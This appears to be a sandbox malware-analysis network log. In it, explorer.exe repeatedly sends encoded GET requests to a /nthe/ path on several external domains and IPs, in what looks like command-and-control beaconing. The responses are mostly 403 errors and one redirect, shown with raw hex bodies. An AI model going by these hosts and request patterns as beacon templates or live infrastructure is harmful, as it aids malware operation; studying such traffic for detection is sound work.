Sep 15, 2021 11:20:30.639823914 CEST | 607 | OUT | GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=enVshZ5ucPnpEJ79XKthUFU7GSCP6zpooNwVCr/P0s5BKPQIOoeKppWI2ezsgMpUEHhlAA== HTTP/1.1
                                                                                      Host: www.authorjameswshepherdonline.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
Sep 15, 2021 11:20:30.756135941 CEST | 608 | IN | HTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:20:30 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139ed55-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
12 | 192.168.2.22 | 49191 | 34.102.136.180 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Sep 15, 2021 11:22:05.497116089 CEST | 614 | OUT | GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=54OfAHeKGwMzfFPkI96ZbDhctG36f6+/FiUzkHshmPfrtcl9VWH+3olASXX+4wyWJIckJQ== HTTP/1.1
                                                                                      Host: www.hanlansmojitovillage.net
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
Sep 15, 2021 11:22:05.612250090 CEST | 615 | IN | HTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:22:05 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139efab-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
13 | 192.168.2.22 | 49195 | 34.102.136.180 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Sep 15, 2021 11:22:43.718801022 CEST | 618 | OUT | GET /nthe/?5jo4nr=JnpX3/YBBy9TCXbKhp8uYEFRBGzb3gJR2p4kRdES4yzOlzRdyh/c8y0xiKK/8z4KJyQSLA==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1
                                                                                      Host: www.thaysay.net
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
Sep 15, 2021 11:22:43.833789110 CEST | 618 | IN | HTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:22:43 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139efab-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
14 | 192.168.2.22 | 49197 | 34.102.136.180 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Sep 15, 2021 11:22:53.937608004 CEST | 620 | OUT | GET /nthe/?5jo4nr=B6rYep0Vm3M2EhGqYu/feA67U2SQJtGoCN7KN6fFlDVSMwI26b57yYW0nsnzi8vT4Ky8RQ==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1
                                                                                      Host: www.onpar-golf.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
Sep 15, 2021 11:22:54.053649902 CEST | 620 | IN | HTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:22:53 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139ed55-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
15 | 192.168.2.22 | 49198 | 192.99.131.252 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Sep 15, 2021 11:22:59.159507036 CEST | 621 | OUT | GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ== HTTP/1.1
                                                                                      Host: www.americanstonesusa.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
Sep 15, 2021 11:22:59.269926071 CEST | 622 | IN | HTTP/1.1 301 Moved Permanently
                                                                                      Date: Wed, 15 Sep 2021 09:22:59 GMT
                                                                                      Server: Apache
                                                                                      Location: https://www.americanstonesusa.com/nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ==
                                                                                      Content-Length: 354
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.americanstonesusa.com/nthe/?t48tJ=fJEp_HN8mPiTHN5P&amp;5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ==">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
16 | 192.168.2.22 | 49199 | 34.102.136.180 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Sep 15, 2021 11:23:04.295397043 CEST | 622 | OUT | GET /nthe/?5jo4nr=S+ZwTBrK0+7RoomNfSvQ9j84ffpxKdfieFGWtVtD4WHCIMGVYLqiZt07bDY98RTkl0TyTg==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1
                                                                                      Host: www.plasticplank.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
Sep 15, 2021 11:23:04.410657883 CEST | 623 | IN | HTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:23:04 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139ed55-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
17 | 192.168.2.22 | 49200 | 34.98.99.30 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Sep 15, 2021 11:23:09.429909945 CEST | 623 | OUT | GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=QEezsAFDlNAB3yJURHSMHXjRGqVB06lXE20lDVvtKCtrVdaWOVmvQD4ln9eCVkj8l4WBCQ== HTTP/1.1
                                                                                      Host: www.realstyleworks.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:23:09.545253038 CEST | 624 | IN | HTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:23:09 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139ed55-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                      2 | 192.168.2.22 | 49169 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                                      Sep 15, 2021 11:18:05.019635916 CEST | 586 | OUT | GET /nthe/?5jo4nr=S+ZwTBrK0+7RoomNfSvQ9j84ffpxKdfieFGWtVtD4WHCIMGVYLqiZt07bDY98RTkl0TyTg==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1
                                                                                      Host: www.plasticplank.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:18:05.138832092 CEST | 587 | IN | HTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:18:05 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139ed55-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                      3 | 192.168.2.22 | 49170 | 34.98.99.30 | 80 | C:\Windows\explorer.exe
                                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                                      Sep 15, 2021 11:18:10.217118979 CEST | 588 | OUT | GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=QEezsAFDlNAB3yJURHSMHXjRGqVB06lXE20lDVvtKCtrVdaWOVmvQD4ln9eCVkj8l4WBCQ== HTTP/1.1
                                                                                      Host: www.realstyleworks.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:18:10.331685066 CEST | 588 | IN | HTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:18:10 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139efab-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                      4 | 192.168.2.22 | 49171 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                                      Sep 15, 2021 11:18:20.416021109 CEST | 589 | OUT | GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=enVshZ5ucPnpEJ79XKthUFU7GSCP6zpooNwVCr/P0s5BKPQIOoeKppWI2ezsgMpUEHhlAA== HTTP/1.1
                                                                                      Host: www.authorjameswshepherdonline.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:18:20.531202078 CEST | 590 | IN | HTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:18:20 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139ed55-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                      5 | 192.168.2.22 | 49176 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                                      Sep 15, 2021 11:19:13.157188892 CEST | 596 | OUT | GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=54OfAHeKGwMzfFPkI96ZbDhctG36f6+/FiUzkHshmPfrtcl9VWH+3olASXX+4wyWJIckJQ== HTTP/1.1
                                                                                      Host: www.hanlansmojitovillage.net
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:19:13.272679090 CEST | 596 | IN | HTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:19:13 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139efab-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                      6 | 192.168.2.22 | 49180 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                                      Sep 15, 2021 11:19:54.712455034 CEST | 600 | OUT | GET /nthe/?5jo4nr=JnpX3/YBBy9TCXbKhp8uYEFRBGzb3gJR2p4kRdES4yzOlzRdyh/c8y0xiKK/8z4KJyQSLA==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1
                                                                                      Host: www.thaysay.net
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:19:54.827491045 CEST | 600 | IN | HTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:19:54 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139ed55-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                      7 | 192.168.2.22 | 49182 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                                      Sep 15, 2021 11:20:05.010581970 CEST | 602 | OUT | GET /nthe/?5jo4nr=B6rYep0Vm3M2EhGqYu/feA67U2SQJtGoCN7KN6fFlDVSMwI26b57yYW0nsnzi8vT4Ky8RQ==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1
                                                                                      Host: www.onpar-golf.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:20:05.125579119 CEST | 603 | IN | HTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Wed, 15 Sep 2021 09:20:05 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6139ed55-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                      8 | 192.168.2.22 | 49183 | 192.99.131.252 | 80 | C:\Windows\explorer.exe
                                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                                      Sep 15, 2021 11:20:10.230083942 CEST | 604 | OUT | GET /nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ== HTTP/1.1
                                                                                      Host: www.americanstonesusa.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Sep 15, 2021 11:20:10.341188908 CEST | 604 | IN | HTTP/1.1 301 Moved Permanently
                                                                                      Date: Wed, 15 Sep 2021 09:20:10 GMT
                                                                                      Server: Apache
                                                                                      Location: https://www.americanstonesusa.com/nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ==
                                                                                      Content-Length: 354
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 6d 65 72 69 63 61 6e 73 74 6f 6e 65 73 75 73 61 2e 63 6f 6d 2f 6e 74 68 65 2f 3f 74 34 38 74 4a 3d 66 4a 45 70 5f 48 4e 38 6d 50 69 54 48 4e 35 50 26 61 6d 70 3b 35 6a 6f 34 6e 72 3d 54 69 57 6b 67 48 34 55 6b 43 37 43 49 71 7a 39 6b 74 63 52 51 79 53 6e 6f 74 2f 68 53 50 30 55 38 34 59 5a 6b 31 51 47 4f 35 7a 2f 68 41 52 69 6e 31 6e 67 36 72 78 55 34 59 2b 2b 73 79 36 59 64 47 70 69 7a 51 3d 3d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.americanstonesusa.com/nthe/?t48tJ=fJEp_HN8mPiTHN5P&amp;5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ==">here</a>.</p></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      9192.168.2.224918434.102.136.18080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Sep 15, 2021 11:20:15.364769936 CEST605OUTGET /nthe/?5jo4nr=S+ZwTBrK0+7RoomNfSvQ9j84ffpxKdfieFGWtVtD4WHCIMGVYLqiZt07bDY98RTkl0TyTg==&t48tJ=fJEp_HN8mPiTHN5P HTTP/1.1
                                                                                      Host: www.plasticplank.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
